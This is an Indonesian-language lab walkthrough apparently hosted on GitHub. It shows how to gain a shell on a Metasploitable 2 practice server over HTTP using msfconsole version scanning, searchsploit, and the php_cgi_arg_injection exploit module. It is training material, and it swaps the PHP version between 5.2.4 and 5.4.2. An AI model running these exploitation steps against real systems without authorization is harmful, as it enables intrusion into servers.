Skip to content

Latest commit

 

History

History
97 lines (66 loc) · 3.61 KB

Exploit Port 80 HTTP.md

File metadata and controls

97 lines (66 loc) · 3.61 KB

Exploit Port 80 (HTTP)

  • Buka halaman web yang ada di server metasploitable 2 melalui browser dengan url http://IP_Metasploitable2

alt text

  • Buka msfconsole di terminal
msfconsole

alt text

  • Gunakan modul auxiliary/scanner/http/http_version untuk mengetahui web server yang digunakan di server
use auxiliary/scanner/http/http_version

alt text

  • Tampilkan daftar parameter yang dibutuhkan di modul tersebut. Disini semua parameter wajib sudah terisi secara default kecuali parameter RHOSTS
show options

alt text

  • Isi parameter RHOST dengan IP metasploitable2
set RHOST <IP_metasploitable2>

alt text

  • Jalankan modul tersebut. Setelah dijalankan didapat informasi bahwa web server yang digunakan adalah apache versi 2.2.8 dan menggunakan PHP versi 5.2.4
run

alt text

  • Gunakan tool searchploit untuk mencari celah keamanan dari apache versi 2.2.8 dan filter berdasarkan keyword php. Disini terdapat informasi bahwa kelamahan PHP versi 5.4.2 adalah cgi-bin Remote Code
searchsploit apache 2.2.8 | grep php

alt text

alt text

  • Ketikkan di kolom pencarian php 5.4.2 lalu tekan submit

alt text

  • Dari hasil pencarian juga didapat informasi bahwa php 5.4.2 rentan dengan CGI script

alt text

  • Buka kembali tool metasploit dan lakukan pencarian modul exploit untuk php 5.4.2
search php 5.4.2

alt text

-gunakan modul exploit/multi/http/php_cgi_arg_injection yang terdapat di list nomor 1

use <nomor_modul>

alt text

  • Tampilkan daftar parameter yang dibutuhkan di modul tersebut. Disini kita hanya perlu mengisi parameter RHOSTS saja
show options

alt text

  • Isi parameter RHOST dengan IP metasploitable2
set RHOST <IP_metasploitable2>

alt text

  • Jalankan modul tersebut
exploit

alt text

  • Setelah dijalankan kita berhasil masuk ke shell server

alt text